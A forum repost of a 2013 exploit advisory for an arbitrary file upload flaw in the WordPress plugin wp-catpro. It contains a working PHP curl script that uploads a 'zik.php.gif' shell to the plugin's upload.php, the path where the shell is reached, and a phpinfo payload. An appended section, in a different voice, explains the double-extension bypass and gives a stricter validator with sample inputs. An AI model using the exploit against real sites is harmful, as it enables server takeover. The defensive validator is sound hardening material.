China Network Penetration Testing Alliance (中国网络渗透测试联盟)

Title: WordPress plugin wp-catpro arbitrary file upload

Author: admin    Time: 2013-2-27 20:12
Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
#-----------------------------------------------------------------------

Author => Zikou-16
Email => zikou16x@gmail.com
Tested on : Windows 7 , Backtrack 5r3
Download : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
####

#=> Exploit info:
------------------
# An attacker can upload file/shell.php.gif
# ("jpg", "gif", "png")  // Allowed file extensions
# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
------------------

#=> Exploit
-----------
<?php

$uploadfile="zik.php.gif";
$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>'/wp-content/uploads/catpro/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);

print "$postResult";

?>

Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif

<?php
phpinfo();
?>
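
A name such as shell.php.gif ends in one of the allowed extensions quoted above, so a check on the trailing extension alone lets it through. The following is an added example of a stricter server-side check, not code from the plugin or from the advisory's author; the function name stored_name_for_upload and the sample inputs are hypothetical and constructed for illustration.

```php
<?php
// Added example (hypothetical helper, not wp-catpro code).
// Allowed extension => magic bytes the file content must start with.
const ALLOWED_TYPES = [
    'jpg' => "\xFF\xD8\xFF",
    'gif' => "GIF8",
    'png' => "\x89PNG\r\n\x1A\n",
];

// Returns a server-generated name for an accepted upload, or null if rejected.
function stored_name_for_upload(string $clientName, string $bytes): ?string
{
    $name  = basename(str_replace('\\', '/', $clientName));
    $parts = explode('.', strtolower($name));

    // Require exactly "base.ext": rejects "zik.php.gif", ".htaccess" and "file.".
    if (count($parts) !== 2 || $parts[0] === '' || !array_key_exists($parts[1], ALLOWED_TYPES)) {
        return null;
    }
    $ext   = $parts[1];
    $magic = ALLOWED_TYPES[$ext];

    // The content must begin with the signature of the claimed image type.
    if (strncmp($bytes, $magic, strlen($magic)) !== 0) {
        return null;
    }
    // Heuristic: a PHP open tag does not belong in an image, even behind a valid header.
    if (stripos($bytes, '<?php') !== false) {
        return null;
    }
    // Never store the client-supplied name: random base plus one known extension.
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

// Constructed samples (not captured data): [client file name, file content].
$samples = [
    ['zik.php.gif', "<?php phpinfo(); ?>"],                     // double extension
    ['pic.gif',     "GIF89a<?php phpinfo(); ?>"],               // valid header, PHP body
    ['photo.png',   "GIF89a\x01\x00\x01\x00\x00\x00\x00;"],     // extension/content mismatch
    ['photo.gif',   "GIF89a\x01\x00\x01\x00\x00\x00\x00;"],     // accepted
];
foreach ($samples as [$name, $bytes]) {
    printf("%-12s => %s\n", $name, stored_name_for_upload($name, $bytes) ?? 'REJECTED');
}
```

Pair a check like this with a web-server rule that disables script handling in the upload directory, so that a file which slips through is served as data rather than executed.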



